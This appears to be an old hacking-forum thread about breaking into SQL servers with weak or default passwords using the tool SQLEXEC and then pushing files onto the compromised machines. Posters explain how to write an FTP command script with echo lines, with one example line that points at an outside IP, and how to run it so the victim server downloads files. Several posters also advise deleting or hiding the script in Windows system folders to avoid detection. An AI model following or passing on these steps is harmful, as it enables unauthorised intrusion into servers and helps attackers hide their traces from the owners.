Hello all
I'm using the program SQLEXEC.EXE to connect to the SQL Vul,
when I'm trying to trasfer the file with TFTP Server I get 'SQL_ERROR'
How can I send the files any way??

And what is that?
what can I do with that?

what that doies is writes the information to connect to an ftp and get the files that are listed.
Since tftp works in udp packets(i think) they maybe lost and might cause an error...
so using ftp is much better

o.k.
10q all

the othere method is called "ftp script?" so, you exec the cmd "echo" to add 1 line into 1 text file and exec this with the cmd ftp -i -n -v -s:<file>.xxx

if it works, the server will connect 2 the IP will get these files and quit after complete.

Does anyone have a link to 'SQLExec' to check for sql?

http://www.yanbing.org/software/sqlexec.zip

best of luck

yes that one is the best sqlexec, i've been using it for a while now

I think that there still not many sysop that let the original pass and the box that still run this are already hacked :-)
Secondly, if you use the method with echo and so... don t forget to erase the file, i found many boxes with such files in the temp folder...

tho :-)

Yes what canardwc said is really true. Always delete the file with the echo commands in it. And try to hide it a bit better then just dir c:\. Like:
echo open 12.34.56.78 21 >> c:\WINNT\system32\wins\
etc.
Or any other dir which is hidden somewhere in win dir.
Because there are so many people who leave the file with the commands on the server in dir c:\.

I pref the ftp command too I also think it's safer then tfpt

read some tutorials first before you start hacking